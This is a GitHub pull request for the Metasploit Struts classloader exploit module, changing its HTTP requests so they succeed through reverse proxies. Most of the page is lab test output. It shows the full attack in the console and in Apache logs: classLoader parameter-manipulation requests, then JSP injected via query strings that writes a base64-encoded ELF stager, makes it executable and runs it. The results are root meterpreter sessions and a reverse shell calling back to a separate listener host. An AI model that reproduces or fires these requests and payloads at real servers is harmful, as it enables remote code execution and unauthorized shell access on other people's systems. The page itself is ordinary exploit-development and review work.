Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Change HTTP requests to succeed when going through HTTP proxies #4708

Merged
merged 1 commit into from Feb 4, 2015
Merged

Change HTTP requests to succeed when going through HTTP proxies #4708

merged 1 commit into from Feb 4, 2015
+10 −3

Conversation

julianvilas
Copy link
Contributor

As @firefart said in #3314 (comment) (thanks buddy!), the way the payload is sent to the server in the HTTP request must be inside vars_get and not directly as uri to avoid problems when Reverse HTTP proxies are in use.

The changes in this PR are to make it happen :)

Testing env:

Test without apache proxy:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           localhost                  yes       The target address
   RPORT           8081                       yes       The target port
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         localhost        no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] localhost:8081 - Modifying Class Loader...
[*] localhost:8081 - Waiting for the server to flush the logfile
[+] localhost:8081 - Log file flushed at http://localhost:8081/fVq1.jsp
[*] localhost:8081 - Generating JSP...
[*] localhost:8081 - Dumping JSP into the logfile...
[*] localhost:8081 - Waiting for the server to flush the logfile
[+] localhost:8081 - Log file flushed at http://localhost:8081/fVq1.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to localhost
[*] Meterpreter session 1 opened (127.0.0.1:51820 -> 127.0.0.1:4444) at 2015-02-04 15:48:06 +0100
[+] Deleted fVq1.jsp
[+] Deleted untVZH

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

Test with apache mod_proxy_ajp:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           localhost                  yes       The target address
   RPORT           80                         yes       The target port
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         localhost        no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] localhost:80 - Modifying Class Loader...
[*] Started bind handler
[*] localhost:80 - Waiting for the server to flush the logfile
[+] localhost:80 - Log file flushed at http://localhost:80/mhzu9704.jsp
[*] localhost:80 - Generating JSP...
[*] localhost:80 - Dumping JSP into the logfile...
[*] localhost:80 - Waiting for the server to flush the logfile
[+] localhost:80 - Log file flushed at http://localhost:80/mhzu9704.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to localhost
[*] Meterpreter session 2 opened (127.0.0.1:38814 -> 127.0.0.1:4444) at 2015-02-04 15:49:55 +0100
[+] Deleted mhzu9704.jsp
[+] Deleted wCPy

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

Apache logs:

localhost - - [04/Feb/2015:15:49:32 +0100] "GET /hello_world/hello.action?class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.directory=webapps/ROOT&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.prefix=mhzu9&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.suffix=.jsp&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.fileDateFormat=704 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:34 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:36 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:39 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:41 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"java.io.FileOutputStream\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"sun.misc.BASE64Decoder\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"java.io.File\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% FileOutputStream oFile = new FileOutputStream(\"wCPy\", false); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAijAAAA8gAAAAcAAAAAEAAAan1YmbIHuQAQAACJ42aB4wDwzYAx2/fjU0NTagKJ4bBmzYBbXlJoAgARXGoQUVCJ4WpmWM2A0eOwZs2AQ7BmiVEEzYCTtgywA82Aid//4Q==\")); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.flush(); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.close(); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% File f = new File(\"wCPy\"); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% f.setExecutable(true); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% Runtime.getRuntime().exec(\"./wCPy\"); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:46 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:48 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:50 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:52 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 2063 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:52 +0100] "GET /hello_world/hello.action?class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.directory=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.prefix=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.suffix=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

@julianvilas julianvilas mentioned this pull request Feb 4, 2015
Merged
@jvazquez-r7 jvazquez-r7 self-assigned this Feb 4, 2015
@jvazquez-r7 jvazquez-r7 merged commit de09559 into rapid7:master Feb 4, 2015
jvazquez-r7 added a commit that referenced this pull request Feb 4, 2015
@jvazquez-r7
Land #4708, @julianvilas's fix for struts_code_exec_classloader HTTP …
72007a5 
…requests
@jvazquez-r7
Copy link
Contributor

Makes sense to me. Test after changes:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting     Required  Description
   ----            ---------------     --------  -----------
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.158.131      yes       The target address
   RPORT           8080                yes       The target port
   STRUTS_VERSION  2.x                 yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /Example2/Login.do  yes       The path to a struts application action
   VHOST                               no        HTTP server virtual host


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.158.1     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf exploit(struts_code_exec_classloader) > set STRUTS_VERSION 1.x
STRUTS_VERSION => 1.x
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:8080 - Modifying Class Loader...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/bCXn500.jsp
[*] 172.16.158.131:8080 - Generating JSP...
[*] 172.16.158.131:8080 - Dumping JSP into the logfile...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[*] 172.16.158.131:8080 - Countdown 7...
[*] Sending stage (36 bytes) to 172.16.158.131
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/bCXn500.jsp
Land #4708, @julianvilas's fix for struts_code_exec_classloader HTTP requests
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.131:37495) at 2015-02-04 09:47:16 -0600
[+] Deleted bCXn500.jsp
[+] Deleted OOx9

3657832983
VwsPTxaDavjNHimxNOXfYIfOxSRmbqxx
ShGrWmjBhVGGOFBeSFBAPxIClpYocGsk
tWhTFrqwKdLWmJDLEVHUzPgkvMSucNjV
id
uid=1000(juan) gid=1000(juan) groups=1000(juan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
^C
Abort session 1? [y/N]  y

Thanks @firefart and @julianvilas !

@julianvilas julianvilas deleted the redsadic-strutsfix branch February 4, 2015 15:54
@firefart
Copy link
Contributor

firefart commented Feb 4, 2015

woohoo thx!

Meatballs1
Meatballs1 reviewed Feb 4, 2015
View reviewed changes
modules/exploits/multi/http/struts_code_exec_classloader.rb
'uri' => uri,
'encode_params' => false,
'vars_get' => {
cmd => ""
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This should be cmd => cmd?

Or drop the cmd argument from the function?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

it shoudl result it /uri?my_command_to_execute so I think the syntax is correct, we don't need a value here

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

So then cmd is redundant and should be removed for clarity?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ah no I see that does make sense, its just not very clear :)

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

jeah it's tricky to read

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jvazquez-r7 jvazquez-r7

Labels
bug module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@julianvilas @jvazquez-r7 @firefart @Meatballs1 @todb-r7